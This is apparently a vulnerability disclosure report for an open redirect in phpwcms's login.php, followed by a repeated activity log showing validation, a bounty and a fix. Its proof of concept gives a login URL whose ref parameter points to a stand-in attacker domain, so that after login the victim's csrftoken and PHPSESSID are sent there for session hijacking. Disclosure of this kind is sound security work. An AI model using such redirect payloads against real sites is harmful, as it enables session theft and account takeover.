Open Redirect in slackero/phpwcms

Valid

Reported on

Aug 12th 2021

✍️ Description

Session hijacking via open redirection

🕵️‍♂️ Proof of Concept

Steps to reproduce
1. Go to http://your-domain.tld/login.php?ref=http://attackers-domain.tld/?
2. Login to a valid account
3. You will be redirected to http://attackers-domain.tld/?&csrftoken=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx&PHPSESSID=yyyyyyyyyyyyyyyy

💥 Impact

This vulnerability allows an attacker to steal csrftoken and PHPSESSID.

When the attacker goes to http://your-domain.tld/phpwcms.php?csrftoken=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx&PHPSESSID=yyyyyyyyyyyyyyyy, the valid user's session will be hijacked.

📍 Location login.php#L81 login.php#L243

Occurrences

bAu modified the report

2 years ago

bAu modified the report

2 years ago

bAu modified the report

2 years ago

bAu modified the report

2 years ago

bAu modified the report

2 years ago

We have contacted a member of the slackero/phpwcms team and are waiting to hear back 2 years ago

A slackero/phpwcms maintainer validated this vulnerability 2 years ago

bAu has been awarded the disclosure bounty

The fix bounty is now up for grabs

A slackero/phpwcms maintainer marked this as fixed with commit 45171f 2 years ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

to join this conversation

bAu modified the report

2 years ago

bAu modified the report

2 years ago

bAu modified the report

2 years ago

bAu modified the report

2 years ago

bAu modified the report

2 years ago

We have contacted a member of the slackero/phpwcms team and are waiting to hear back 2 years ago

A slackero/phpwcms maintainer validated this vulnerability 2 years ago

bAu has been awarded the disclosure bounty

The fix bounty is now up for grabs

A slackero/phpwcms maintainer marked this as fixed with commit 45171f 2 years ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

to join this conversation